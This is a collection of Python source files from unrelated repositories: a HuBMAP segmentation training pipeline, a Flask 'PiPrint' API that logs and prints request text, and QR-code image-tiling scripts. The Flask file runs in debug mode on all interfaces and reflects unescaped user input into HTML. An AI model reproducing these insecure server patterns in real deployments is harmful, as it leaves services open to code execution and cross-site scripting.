dataset=train_dataset,
sampler=RandomSampler(train_dataset),
drop_last=True,
batch_size=cfg.TRAIN_LOADER.BATCH_SIZE,
num_workers=cfg.TRAIN_LOADER.NUM_WORKERS
)
return train_loader
def build_valid_loader(cfg):
valid_transform = get_valid_transform(cfg)
df = pd.read_csv(
os.path.join(cfg.DATASET.TILE_DIR, 'coord.csv')
)
valid_dataset = hmTrainDataset(
df = df,
img_ids = cfg.DATASET.VALID_ID,
cfg = cfg,
transforms=valid_transform
)
valid_loader = DataLoader(
dataset=valid_dataset,
sampler=SequentialSampler(valid_dataset),
drop_last=False,
batch_size=cfg.VALID_LOADER.BATCH_SIZE,
num_workers=cfg.VALID_LOADER.NUM_WORKERS
)
return valid_loader |
GenoM87/hubmap | src/create_tile.py | import os
import cv2
import pandas as pd
import numpy as np
import rasterio
from utils import create_tile, read_tiff, rle2mask, create_tile_v2
from config import _C as cfg
img_scale = cfg.DATASET.IMG_SCALE
tile_size = cfg.DATASET.TRAIN_TILE_SIZE
tile_avg_step = cfg.DATASET.TRAIN_TILE_AVG_STEP
tile_min_score = cfg.DATASET.TRAIN_TILE_MIN_SCORE
if __name__ == "__main__":
df_train = pd.read_csv(os.path.join(cfg.DATA_DIR, 'train.csv'))
path_tile = f'{img_scale}_{tile_min_score}_{tile_size}_{tile_avg_step}_train'
IMG_OUT = os.path.join(cfg.DATA_DIR, 'train', path_tile)
os.makedirs(IMG_OUT, exist_ok=True)
print(path_tile)
df_coord = pd.DataFrame()
for cnt, row in df_train.iterrows():
img_id, encoding = row['id'], row['encoding']
path_image = os.path.join(cfg.DATA_DIR, 'train', img_id+'.tiff')
os.makedirs(os.path.join(IMG_OUT, img_id), exist_ok=True)
print(f'CREATING TILE FOR IMAGE {img_id}')
res = create_tile_v2(
img_id,
df_train,
cfg,
phase='train'
)
df_image = pd.DataFrame()
coord = np.array(res['coord'])
df_image['cx']=coord[:,0].astype(np.int32)
df_image['cy']=coord[:,1].astype(np.int32)
df_image['cv']=coord[:,2]
df_image['image_id'] = img_id
df_coord = df_coord.append(df_image)
tile_id = []
for i in range(len(res['coord'])):
cx, cy, cv = res['coord'][i]
s = f'x{cx}_y{cy}'
tile_id.append(s)
tile_img = res['img_tile'][i]
tile_mask = res['mask_tile'][i]
cv2.imwrite(os.path.join(IMG_OUT, img_id, f'{s}.png'), tile_img)
cv2.imwrite(os.path.join(IMG_OUT, img_id, f'{s}.mask.png'), tile_mask)
df_coord.to_csv(os.path.join(IMG_OUT, 'coord.csv'), index=False)
|
GenoM87/hubmap | src/main.py | <reponame>GenoM87/hubmap<gh_stars>0
import sys, os, time, logging, datetime
from pathlib import Path
from engine.fitter import Fitter
from config import _C as cfg
from models.model import build_model
from data_builder import build_valid_loader, build_train_loader
#Creo lla directory per l'esperimento
path_exp = os.path.join(
cfg.PROJECT_DIR, 'experiments', cfg.MODEL.NAME, str(datetime.date.today())
)
Path(path_exp).mkdir(parents=True, exist_ok=True)
#Istanzio il logger
path_logger = os.path.join(
path_exp, f'train-{datetime.datetime.now()}.log'
)
logging.basicConfig(filename=path_logger, level=logging.DEBUG)
logger = logging.getLogger()
if __name__ == "__main__":
model = build_model(cfg)
train_loader = build_train_loader(cfg)
valid_loader = build_valid_loader(cfg)
engine = Fitter(
model=model,
cfg=cfg,
train_loader=train_loader,
val_loader=valid_loader,
logger=logger,
exp_path=path_exp
)
engine.train()
engine.final_check()
#engine.compute_shift() |
kylemikableh/KyAPI | main.py | <reponame>kylemikableh/KyAPI<filename>main.py
"""
PiPrint API
Print anything to a (DotMatrix) printer and log from REST
MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os.path
import platform
import subprocess
from datetime import datetime
from strenum import StrEnum
from flask import Flask
from flask import request
from flask_restful import Api
app = Flask(__name__)
api = Api(app)
# REST Get Parameters
ARG_KEY = 'key'
ARG_PRINT_DATA = 'pdata'
# FILE Names and paths
KEYFILE_FILE = 'keys.txt'
PRINTLOG_FILE = 'print.log'
TEMPPRINT_FILE = 'tempprint.txt'
class Platform(StrEnum):
"""
Class for enums of Platforms to detect
"""
LINUX = "Linux"
MAC = "Darwin"
WINDOWS = "Windows"
def create_default_files():
"""
Generate default files for the API server
:return:
"""
if not os.path.exists(KEYFILE_FILE):
fp = open(KEYFILE_FILE, 'w', encoding="utf8") # pylint: disable=invalid-name,consider-using-with
default_key = input("No keys file detected! Please enter first API key: ")
fp.write(default_key)
fp.close()
if not os.path.exists(PRINTLOG_FILE):
fp = open(PRINTLOG_FILE, 'x', encoding="utf8") # pylint: disable=invalid-name,consider-using-with
fp.close()
if not os.path.exists(TEMPPRINT_FILE):
fp = open(TEMPPRINT_FILE, 'x', encoding="utf8") # pylint: disable=invalid-name,consider-using-with
fp.close()
def contains_required_args(request_passed):
"""
Check if the request contains an API key
:param request_passed: the URL request
:return: True if contains the key, False otherwise
"""
params = request_passed.args
key = params.get(ARG_KEY)
if not key:
return False
return True
def get_dict_of_keys():
"""
Grab all valid API keys from file
:return: dict of string of keys
"""
with open(KEYFILE_FILE, encoding="utf8") as key_file:
keys = key_file.read().splitlines()
return keys
def verify(request_passed):
"""
Verify that the key passed is valid
:param request_passed: URL request passed
:return: True if key is valid
"""
params = request_passed.args
key = params.get(ARG_KEY)
key_file_exists = os.path.exists(KEYFILE_FILE)
if key_file_exists:
keys = get_dict_of_keys()
if key not in keys:
return False
return True
error = '''API Key File {} was not found,
rejecting all requests'''.format(KEYFILE_FILE) # pylint: disable=consider-using-f-string
app.logger.error(error) # pylint: disable=no-member
return False
def format_for_dot_matrix(data):
"""
Format the data for the DotMatrix printer
:param data: String data to print to printer
:return: Correctly formatted data for printer
"""
now = datetime.now()
dt_string = now.strftime("[%m/%d/%y/%H:%M:%S] ")
return_data = dt_string + data
return return_data
def print_to_locations():
"""
Send print data to printing locations
:return: String of status
"""
params = request.args
data = params.get(ARG_PRINT_DATA)
if not data:
return '''Did not recieve any print data. Not printing.'''
app.logger.info('''Recieved print data: {}'''.format(data)) # pylint: disable=no-member,consider-using-f-string
formatted_data = format_for_dot_matrix(data)
if os.path.exists(PRINTLOG_FILE):
app.logger.info('''Printing to logfile recieved print data''') # pylint: disable=no-member
log_file = open(PRINTLOG_FILE, 'a', encoding="utf8") # pylint: disable=consider-using-with
log_file.write(formatted_data + "\n")
log_file.close()
else:
app.logger.error('''Missing print file, please restart server.''') # pylint: disable=no-member
#
print_status = print_to_printer(formatted_data)
app.logger.error('''Print status: {}'''.format(print_status)) # pylint: disable=no-member,consider-using-f-string
return '''Recieved print data: {}.<br> Printer status:<br>{}'''.format(data, print_status) # pylint: disable=consider-using-f-string
def cups_hold_release():
"""
For CUPS we need to hold the print and set the release to 1 second later'
(This is a workaround for CUPS always printing the previous document
for some reason, this is supposed to fix that) (Currently not working)
:return:
"""
now = datetime.now()
dt_hour_str = now.strftime("%H")
dt_min_str = now.strftime("%M")
dt_sec_str = now.strftime("%S")
dt_sec_str = str(int(dt_sec_str) + 1) # add one sec for printing a second from now
# Handle edge cases/cascades
if int(dt_sec_str) > 59:
dt_sec_str = "0"
dt_min_str = str(int(dt_min_str) + 1) # add one min
if int(dt_min_str) > 59:
dt_min_str = "0"
dt_hour_str = str(int(dt_hour_str) + 1)
if int(dt_hour_str) > 23:
dt_hour_str = "0"
cmd = '''lp -o raw -o job-hold-until={}:{}:{} {}
'''.format(dt_hour_str, dt_min_str, dt_sec_str, TEMPPRINT_FILE) # pylint: disable=consider-using-f-string
subprocess.run(cmd, shell=True, check=True)
def print_to_printer(data):
"""
Print to printer
:return:
"""
log_file = open(TEMPPRINT_FILE, 'w', encoding="utf8") # pylint: disable=consider-using-with
log_file.write('\n') # Fix for CUPS not printing the first line
log_file.write(data)
log_file.close()
current_platform = platform.system()
app.logger.error('''Printing to printer with os: {}'''.format(current_platform)) # pylint: disable=no-member,consider-using-f-string
with open(TEMPPRINT_FILE, encoding="utf8") as key_file:
key = key_file.read()
app.logger.error('''File to print contains: {}'''.format(key)) # pylint: disable=no-member,consider-using-f-string
if current_platform == Platform.WINDOWS:
os.startfile(TEMPPRINT_FILE, "print")
return '''Platform detected: WINDOWS'''
if current_platform == Platform.MAC:
return '''Platform detected: MAC'''
if current_platform == Platform.LINUX:
cmd = '''lp -o raw {}'''.format(TEMPPRINT_FILE) # pylint: disable=consider-using-f-string
subprocess.run(cmd, shell=True, check=True)
return '''Platform detected: LINUX'''
return '''Did not find platform: {}'''.format(Platform.MAC) # pylint: disable=consider-using-f-string
@app.route('/', methods=['GET'])
def home():
"""
Default home landing page. Shouldn't do anything, might add documentation or something
:return:
"""
return '''<html><head><title>PiPrint API</title></head><h1>PiPrint API</h1>
<p>Kyle's simple API server. Must supply path and API key for access.</p></html>'''
@app.route('/print', methods=['GET'])
def print_request():
"""
The print path
:return: String to return to browser, e.g. HTML
"""
if contains_required_args(request):
if verify(request):
# We have been verified, now do function
return print_to_locations()
return '''API Key invalid'''
return '''API key not provided'''
if __name__ == '__main__':
create_default_files()
logFileLocation = os.path.abspath(PRINTLOG_FILE)
print('''Log file is located at: {}'''.format(logFileLocation)) # pylint: disable=consider-using-f-string
keysFileLocation = os.path.abspath(KEYFILE_FILE)
print('''Key file is located at: {}'''.format(keysFileLocation)) # pylint: disable=consider-using-f-string
app.run('0.0.0.0', port=5000, debug=True)
|
importerror/Python-QR-code | Comb_image1.py | from qrcode import *
import re, sys
import Image
img0 =Image.open('scan49M.png')
img1 =Image.open('scan50N.png')
img2 =Image.open('scan52O.png')
img3 =Image.open('scan54P.png')
img4 =Image.open('scan58Q.png')
img5 =Image.open('scan60R.png')
img6 =Image.open('scan64S.png')
img7 =Image.open('scan66T.png')
img8 =Image.open('scan70U.png')
img9 =Image.open('scan76V.png')
img10 =Image.open('scan78W.png')
img11 =Image.open('scan84X.png')
img12 =Image.open('scan88Y.png')
img13 =Image.open('scan90Z.png')
img14 =Image.open('scan94A.png')
img15 =Image.open('scan100B.png')
img16 =Image.open('scan106C.png')
img17 =Image.open('scan108D.png')
img18 =Image.open('scan114E.png')
img19 =Image.open('scan118F.png')
img20 =Image.open('scan120G.png')
img21 =Image.open('scan126H.png')
img22 =Image.open('scan130I.png')
img23 =Image.open('scan136J.png')
img24 =Image.open('scan144K.png')
img25 =Image.open('scan148L.png')
img26 =Image.open('scan150M.png')
img27 =Image.open('scan154N.png')
img28 =Image.open('scan156O.png')
img29 =Image.open('scan160P.png')
img30 =Image.open('scan174Q.png')
img31 =Image.open('scan178R.png')
img32 =Image.open('scan184S.png')
img33 =Image.open('scan186T.png')
img34 =Image.open('scan196U.png')
img35 =Image.open('scan198V.png')
img36 =Image.open('scan204W.png')
img37 =Image.open('scan210X.png')
img38 =Image.open('scan214Y.png')
img39 =Image.open('scan220Z.png')
img40 =Image.open('scan226A.png')
img41 =Image.open('scan228B.png')
img42 =Image.open('scan238C.png')
img43 =Image.open('scan240D.png')
img44 =Image.open('scan244E.png')
img45 =Image.open('scan246F.png')
img46 =Image.open('scan258G.png')
img47 =Image.open('scan270H.png')
img48 =Image.open('scan274I.png')
img49 =Image.open('scan276J.png')
img50 =Image.open('scan280K.png')
img51 =Image.open('scan286L.png')
img52 =Image.open('scan288M.png')
img53 =Image.open('scan298N.png')
img54 =Image.open('scan304O.png')
img55 =Image.open('scan310P.png')
img56 =Image.open('scan316Q.png')
img57 =Image.open('scan318R.png')
img58 =Image.open('scan324S.png')
img59 =Image.open('scan328T.png')
img60 =Image.open('scan330U.png')
img61 =Image.open('scan340V.png')
img62 =Image.open('scan354W.png')
img63 =Image.open('scan358X.png')
img64 =Image.open('scan360Y.png')
img65 =Image.open('scan364Z.png')
img66 =Image.open('scan378A.png')
img67 =Image.open('scan384B.png')
img68 =Image.open('scan394C.png')
img69 =Image.open('scan396D.png')
img70 =Image.open('scan400E.png')
img71 =Image.open('scan406F.png')
img72 =Image.open('scan414G.png')
img73 =Image.open('scan420H.png')
img74 =Image.open('scan426I.png')
img75 =Image.open('scan430J.png')
img76 =Image.open('scan436K.png')
img77 =Image.open('scan444L.png')
img78 =Image.open('scan448M.png')
img79 =Image.open('scan456N.png')
img80 =Image.open('scan466O.png')
img81 =Image.open('scan468P.png')
img82 =Image.open('scan478Q.png')
img83 =Image.open('scan480R.png')
img84 =Image.open('scan486S.png')
img85 =Image.open('scan490T.png')
img86 =Image.open('scan496U.png')
img87 =Image.open('scan504V.png')
img88 =Image.open('scan508W.png')
img89 =Image.open('scan510X.png')
Final_img=Image.new('RGB',(1300,1000))
img0.thumbnail((110,110))
img1.thumbnail((110,110))
img2.thumbnail((110,110))
img3.thumbnail((110,110))
img4.thumbnail((110,110))
img5.thumbnail((110,110))
img6.thumbnail((110,110))
img7.thumbnail((110,110))
img8.thumbnail((110,110))
img9.thumbnail((110,110))
img10.thumbnail((110,110))
img11.thumbnail((110,110))
img12.thumbnail((110,110))
img13.thumbnail((110,110))
img14.thumbnail((110,110))
img15.thumbnail((110,110))
img16.thumbnail((110,110))
img17.thumbnail((110,110))
img18.thumbnail((110,110))
img19.thumbnail((110,110))
img20.thumbnail((110,110))
img21.thumbnail((110,110))
img22.thumbnail((110,110))
img23.thumbnail((110,110))
img24.thumbnail((110,110))
img25.thumbnail((110,110))
img26.thumbnail((110,110))
img27.thumbnail((110,110))
img28.thumbnail((110,110))
img29.thumbnail((110,110))
img30.thumbnail((110,110))
img31.thumbnail((110,110))
img32.thumbnail((110,110))
img33.thumbnail((110,110))
img34.thumbnail((110,110))
img35.thumbnail((110,110))
img36.thumbnail((110,110))
img37.thumbnail((110,110))
img38.thumbnail((110,110))
img39.thumbnail((110,110))
img40.thumbnail((110,110))
img41.thumbnail((110,110))
img42.thumbnail((110,110))
img43.thumbnail((110,110))
img44.thumbnail((110,110))
img45.thumbnail((110,110))
img46.thumbnail((110,110))
img47.thumbnail((110,110))
img48.thumbnail((110,110))
img49.thumbnail((110,110))
img50.thumbnail((110,110))
img51.thumbnail((110,110))
img52.thumbnail((110,110))
img53.thumbnail((110,110))
img54.thumbnail((110,110))
img55.thumbnail((110,110))
img56.thumbnail((110,110))
img57.thumbnail((110,110))
img58.thumbnail((110,110))
img59.thumbnail((110,110))
img60.thumbnail((110,110))
img61.thumbnail((110,110))
img62.thumbnail((110,110))
img63.thumbnail((110,110))
img64.thumbnail((110,110))
img65.thumbnail((110,110))
img66.thumbnail((110,110))
img67.thumbnail((110,110))
img68.thumbnail((110,110))
img69.thumbnail((110,110))
img70.thumbnail((110,110))
img71.thumbnail((110,110))
img72.thumbnail((110,110))
img73.thumbnail((110,110))
img74.thumbnail((110,110))
img75.thumbnail((110,110))
img76.thumbnail((110,110))
img77.thumbnail((110,110))
img78.thumbnail((110,110))
img79.thumbnail((110,110))
img80.thumbnail((110,110))
img81.thumbnail((110,110))
img82.thumbnail((110,110))
img83.thumbnail((110,110))
img84.thumbnail((110,110))
img85.thumbnail((110,110))
img86.thumbnail((110,110))
img87.thumbnail((110,110))
img88.thumbnail((110,110))
img89.thumbnail((110,110))
i=110
j=110
Final_img.paste(img0,(0,0*1))
Final_img.paste(img1,(0,j*1))
Final_img.paste(img2,(0,j*2))
Final_img.paste(img3,(0,j*3))
Final_img.paste(img4,(0,j*4))
Final_img.paste(img5,(0,j*5))
Final_img.paste(img6,(0,j*6))
Final_img.paste(img7,(0,j*7))
Final_img.paste(img8,(0,j*8))
Final_img.paste(img9,(0,j*9))
Final_img.paste(img10,(i*1,0*1))
Final_img.paste(img11,(i*1,j*1))
Final_img.paste(img12,(i*1,j*2))
Final_img.paste(img13,(i*1,j*3))
Final_img.paste(img14,(i*1,j*4))
Final_img.paste(img15,(i*1,j*5))
Final_img.paste(img16,(i*1,j*6))
Final_img.paste(img17,(i*1,j*7))
Final_img.paste(img18,(i*1,j*8))
Final_img.paste(img19,(i*1,j*9))
Final_img.paste(img20,(i*2,j*0))
Final_img.paste(img21,(i*2,j*1))
Final_img.paste(img22,(i*2,j*2))
Final_img.paste(img23,(i*2,j*3))
Final_img.paste(img24,(i*2,j*4))
Final_img.paste(img25,(i*2,j*5))
Final_img.paste(img26,(i*2,j*6))
Final_img.paste(img27,(i*2,j*7))
Final_img.paste(img28,(i*2,j*8))
Final_img.paste(img29,(i*2,j*9))
Final_img.paste(img30,(i*3,j*0))
Final_img.paste(img31,(i*3,j*1))
Final_img.paste(img32,(i*3,j*2))
Final_img.paste(img33,(i*3,j*3))
Final_img.paste(img34,(i*3,j*4))
Final_img.paste(img35,(i*3,j*5))
Final_img.paste(img36,(i*3,j*6))
Final_img.paste(img37,(i*3,j*7))
Final_img.paste(img38,(i*3,j*8))
Final_img.paste(img39,(i*3,j*9))
Final_img.paste(img40,(i*4,j*0))
Final_img.paste(img41,(i*4,j*1))
Final_img.paste(img42,(i*4,j*2))
Final_img.paste(img43,(i*4,j*3))
Final_img.paste(img44,(i*4,j*4))
Final_img.paste(img45,(i*4,j*5))
Final_img.paste(img46,(i*4,j*6))
Final_img.paste(img47,(i*4,j*7))
Final_img.paste(img48,(i*4,j*8))
Final_img.paste(img49,(i*4,j*9))
Final_img.paste(img50,(i*5,j*0))
Final_img.paste(img51,(i*5,j*1))
Final_img.paste(img52,(i*5,j*2))
Final_img.paste(img53,(i*5,j*3))
Final_img.paste(img54,(i*5,j*4))
Final_img.paste(img55,(i*5,j*5))
Final_img.paste(img56,(i*5,j*6))
Final_img.paste(img57,(i*5,j*7))
Final_img.paste(img58,(i*5,j*8))
Final_img.paste(img59,(i*5,j*9))
Final_img.paste(img60,(i*6,j*0))
Final_img.paste(img61,(i*6,j*1))
Final_img.paste(img62,(i*6,j*2))
Final_img.paste(img63,(i*6,j*3))
Final_img.paste(img64,(i*6,j*4))
Final_img.paste(img65,(i*6,j*5))
Final_img.paste(img66,(i*6,j*6))
Final_img.paste(img67,(i*6,j*7))
Final_img.paste(img68,(i*6,j*8))
Final_img.paste(img69,(i*6,j*9))
Final_img.paste(img70,(i*7,j*0))
Final_img.paste(img71,(i*7,j*1))
Final_img.paste(img72,(i*7,j*2))
Final_img.paste(img73,(i*7,j*3))
Final_img.paste(img74,(i*7,j*4))
Final_img.paste(img75,(i*7,j*5))
Final_img.paste(img76,(i*7,j*6))
Final_img.paste(img77,(i*7,j*7))
Final_img.paste(img78,(i*7,j*8))
Final_img.paste(img79,(i*7,j*9))
Final_img.paste(img80,(i*8,j*0))
Final_img.paste(img81,(i*8,j*1))
Final_img.paste(img82,(i*8,j*2))
Final_img.paste(img83,(i*8,j*3))
Final_img.paste(img84,(i*8,j*4))
Final_img.paste(img85,(i*8,j*5))
Final_img.paste(img86,(i*8,j*6))
Final_img.paste(img87,(i*8,j*7))
Final_img.paste(img88,(i*8,j*8))
Final_img.paste(img89,(i*8,j*9))
Final_img.save('Final image1.png')
|
importerror/Python-QR-code | Comb_image2.py | from qrcode import *
import re, sys
import Image
img89=Image.open('scan510X.png')
img90=Image.open('scan514Y.png')
img91=Image.open('scan526Z.png')
img92=Image.open('scan534A.png')
img93=Image.open('scan538B.png')
img94=Image.open('scan546C.png')
img95=Image.open('scan550D.png')
img96=Image.open('scan556E.png')
img97=Image.open('scan568F.png')
img98=Image.open('scan570G.png')
img99=Image.open('scan588H.png')
img100=Image.open('scan594I.png')
img101=Image.open('scan604J.png')
img102=Image.open('scan610K.png')
img103=Image.open('scan616L.png')
img104=Image.open('scan618M.png')
img105=Image.open('scan624N.png')
img106=Image.open('scan634O.png')
img107=Image.open('scan640P.png')
img108=Image.open('scan646Q.png')
img109=Image.open('scan648R.png')
img110=Image.open('scan654S.png')
img111=Image.open('scan660T.png')
img112=Image.open('scan664U.png')
img113=Image.open('scan666V.png')
img114=Image.open('scan678W.png')
img115=Image.open('scan688X.png')
img116=Image.open('scan690Y.png')
img117=Image.open('scan694Z.png')
img118=Image.open('scan700A.png')
img119=Image.open('scan706B.png')
img120=Image.open('scan708C.png')
img121=Image.open('scan720D.png')
img122=Image.open('scan724E.png')
img123=Image.open('scan730F.png')
img124=Image.open('scan738G.png')
img125=Image.open('scan748H.png')
img126=Image.open('scan756I.png')
img127=Image.open('scan766J.png')
img128=Image.open('scan774K.png')
img129=Image.open('scan780L.png')
img130=Image.open('scan786M.png')
img131=Image.open('scan790N.png')
img132=Image.open('scan798O.png')
img133=Image.open('scan804P.png')
img134=Image.open('scan808Q.png')
img135=Image.open('scan816R.png')
img136=Image.open('scan820S.png')
img137=Image.open('scan834T.png')
img138=Image.open('scan844U.png')
img139=Image.open('scan856V.png')
img140=Image.open('scan858W.png')
img141=Image.open('scan868X.png')
img142=Image.open('scan870Y.png')
img143=Image.open('scan874Z.png')
img144=Image.open('scan876A.png')
img145=Image.open('scan886B.png')
img146=Image.open('scan900C.png')
img147=Image.open('scan904D.png')
img148=Image.open('scan906E.png')
img149=Image.open('scan910F.png')
img150=Image.open('scan924G.png')
img151=Image.open('scan928H.png')
img152=Image.open('scan930I.png')
img153=Image.open('scan934J.png')
img154=Image.open('scan954K.png')
img155=Image.open('scan958L.png')
img156=Image.open('scan966M.png')
img157=Image.open('scan976N.png')
img158=Image.open('scan984O.png')
img159=Image.open('scan988P.png')
img160=Image.open('scan994Q.png')
img161=Image.open('scan1000R.png')
img162=Image.open('scan1014S.png')
img163=Image.open('scan1018T.png')
img164=Image.open('scan1024U.png')
img165=Image.open('scan1030V.png')
img166=Image.open('scan1038W.png')
img167=Image.open('scan1044X.png')
img168=Image.open('scan1056Y.png')
img169=Image.open('scan1060Z.png')
img170=Image.open('scan1066A.png')
img171=Image.open('scan1068B.png')
img172=Image.open('scan1078C.png')
img173=Image.open('scan1080D.png')
img174=Image.open('scan1086E.png')
img175=Image.open('scan1096F.png')
img176=Image.open('scan1098G.png')
img177=Image.open('scan1108H.png')
img178=Image.open('scan1110I.png')
Final_img=Image.new('RGB',(1300,1000))
img89.thumbnail((110,110))
img90.thumbnail((110,110))
img91.thumbnail((110,110))
img92.thumbnail((110,110))
img93.thumbnail((110,110))
img94.thumbnail((110,110))
img95.thumbnail((110,110))
img96.thumbnail((110,110))
img97.thumbnail((110,110))
img98.thumbnail((110,110))
img99.thumbnail((110,110))
img100.thumbnail((110,110))
img101.thumbnail((110,110))
img102.thumbnail((110,110))
img103.thumbnail((110,110))
img104.thumbnail((110,110))
img105.thumbnail((110,110))
img106.thumbnail((110,110))
img107.thumbnail((110,110))
img108.thumbnail((110,110))
img109.thumbnail((110,110))
img110.thumbnail((110,110))
img111.thumbnail((110,110))
img112.thumbnail((110,110))
img113.thumbnail((110,110))
img114.thumbnail((110,110))
img115.thumbnail((110,110))
img116.thumbnail((110,110))
img117.thumbnail((110,110))
img118.thumbnail((110,110))
img119.thumbnail((110,110))
img120.thumbnail((110,110))
img121.thumbnail((110,110))
img122.thumbnail((110,110))
img123.thumbnail((110,110))
img124.thumbnail((110,110))
img125.thumbnail((110,110))
img126.thumbnail((110,110))
img127.thumbnail((110,110))
img128.thumbnail((110,110))
img129.thumbnail((110,110))
img130.thumbnail((110,110))
img131.thumbnail((110,110))
img132.thumbnail((110,110))
img133.thumbnail((110,110))
img134.thumbnail((110,110))
img135.thumbnail((110,110))
img136.thumbnail((110,110))
img137.thumbnail((110,110))
img138.thumbnail((110,110))
img139.thumbnail((110,110))
img140.thumbnail((110,110))
img141.thumbnail((110,110))
img142.thumbnail((110,110))
img143.thumbnail((110,110))
img144.thumbnail((110,110))
img145.thumbnail((110,110))
img146.thumbnail((110,110))
img147.thumbnail((110,110))
img148.thumbnail((110,110))
img149.thumbnail((110,110))
img150.thumbnail((110,110))
img151.thumbnail((110,110))
img152.thumbnail((110,110))
img153.thumbnail((110,110))
img154.thumbnail((110,110))
img155.thumbnail((110,110))
img156.thumbnail((110,110))
img157.thumbnail((110,110))
img158.thumbnail((110,110))
img159.thumbnail((110,110))
img160.thumbnail((110,110))
img161.thumbnail((110,110))
img162.thumbnail((110,110))
img163.thumbnail((110,110))
img164.thumbnail((110,110))
img165.thumbnail((110,110))
img166.thumbnail((110,110))
img167.thumbnail((110,110))
img168.thumbnail((110,110))
img169.thumbnail((110,110))
img170.thumbnail((110,110))
img171.thumbnail((110,110))
img172.thumbnail((110,110))
img173.thumbnail((110,110))
img174.thumbnail((110,110))
img175.thumbnail((110,110))
img176.thumbnail((110,110))
img177.thumbnail((110,110))
img178.thumbnail((110,110))
i=110
j=110
Final_img.paste(img89,(0,0*1))
Final_img.paste(img90,(0,j*1))
Final_img.paste(img91,(0,j*2))
Final_img.paste(img92,(0,j*3))
Final_img.paste(img93,(0,j*4))
Final_img.paste(img94,(0,j*5))
Final_img.paste(img95,(0,j*6))
Final_img.paste(img96,(0,j*7))
Final_img.paste(img97,(0,j*8))
Final_img.paste(img98,(0,j*9))
Final_img.paste(img99,(i*1,0*1))
Final_img.paste(img100,(i*1,j*1))
Final_img.paste(img101,(i*1,j*2))
Final_img.paste(img102,(i*1,j*3))
Final_img.paste(img103,(i*1,j*4))
Final_img.paste(img104,(i*1,j*5))
Final_img.paste(img105,(i*1,j*6))
Final_img.paste(img106,(i*1,j*7))
Final_img.paste(img107,(i*1,j*8))
Final_img.paste(img108,(i*1,j*9))
Final_img.paste(img109,(i*2,j*0))
Final_img.paste(img110,(i*2,j*1))
Final_img.paste(img111,(i*2,j*2))
Final_img.paste(img112,(i*2,j*3))
Final_img.paste(img113,(i*2,j*4))
Final_img.paste(img114,(i*2,j*5))
Final_img.paste(img115,(i*2,j*6))
Final_img.paste(img116,(i*2,j*7))
Final_img.paste(img117,(i*2,j*8))
Final_img.paste(img118,(i*2,j*9))
Final_img.paste(img119,(i*3,j*0))
Final_img.paste(img120,(i*3,j*1))
Final_img.paste(img121,(i*3,j*2))
Final_img.paste(img122,(i*3,j*3))
Final_img.paste(img123,(i*3,j*4))
Final_img.paste(img124,(i*3,j*5))
Final_img.paste(img125,(i*3,j*6))
Final_img.paste(img126,(i*3,j*7))
Final_img.paste(img127,(i*3,j*8))
Final_img.paste(img128,(i*3,j*9))
Final_img.paste(img129,(i*4,j*0))
Final_img.paste(img130,(i*4,j*1))
Final_img.paste(img131,(i*4,j*2))
Final_img.paste(img132,(i*4,j*3))
Final_img.paste(img133,(i*4,j*4))
Final_img.paste(img134,(i*4,j*5))
Final_img.paste(img135,(i*4,j*6))
Final_img.paste(img136,(i*4,j*7))
Final_img.paste(img137,(i*4,j*8))
Final_img.paste(img138,(i*4,j*9))
Final_img.paste(img139,(i*5,j*0))
Final_img.paste(img140,(i*5,j*1))
Final_img.paste(img141,(i*5,j*2))
Final_img.paste(img142,(i*5,j*3))
Final_img.paste(img143,(i*5,j*4))
Final_img.paste(img144,(i*5,j*5))
Final_img.paste(img145,(i*5,j*6))
Final_img.paste(img146,(i*5,j*7))
Final_img.paste(img147,(i*5,j*8))
Final_img.paste(img148,(i*5,j*9))
Final_img.paste(img149,(i*6,j*0))
Final_img.paste(img150,(i*6,j*1))
Final_img.paste(img151,(i*6,j*2))
Final_img.paste(img152,(i*6,j*3))
Final_img.paste(img153,(i*6,j*4))
Final_img.paste(img154,(i*6,j*5))
Final_img.paste(img155,(i*6,j*6))
Final_img.paste(img156,(i*6,j*7))
Final_img.paste(img157,(i*6,j*8))
Final_img.paste(img158,(i*6,j*9))
Final_img.paste(img159,(i*7,j*0))
Final_img.paste(img160,(i*7,j*1))
Final_img.paste(img161,(i*7,j*2))
Final_img.paste(img162,(i*7,j*3))
Final_img.paste(img163,(i*7,j*4))
Final_img.paste(img164,(i*7,j*5))
Final_img.paste(img165,(i*7,j*6))
Final_img.paste(img166,(i*7,j*7))
Final_img.paste(img167,(i*7,j*8))
Final_img.paste(img168,(i*7,j*9))
Final_img.paste(img169,(i*8,j*0))
Final_img.paste(img170,(i*8,j*1))
Final_img.paste(img171,(i*8,j*2))
Final_img.paste(img172,(i*8,j*3))
Final_img.paste(img173,(i*8,j*4))
Final_img.paste(img174,(i*8,j*5))
Final_img.paste(img175,(i*8,j*6))
Final_img.paste(img176,(i*8,j*7))
Final_img.paste(img177,(i*8,j*8))
Final_img.paste(img178,(i*8,j*9))
Final_img.save('Final image2.png')
|
importerror/Python-QR-code | Merge_Images_dir.py | <reponame>importerror/Python-QR-code
from qrcode import *
import re, sys
import Image
#Prime Number generator part
def isPrime(n):
return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None
N = 249 #students
M = 100
l = list()
A=['M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H',
'I','J','K','L','restart']
while len(l) < N:
l += filter(isPrime, range(M - 100, M))
M += 100
Values=list()
j=0
for i in l:
if A[j]=='restart':
A=['M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','restart']
Values.append('scan'+str(i+47)+A[j]+'.png')
j+=1
flag=0
l=0
for k in Values:
img=Image.open(k)
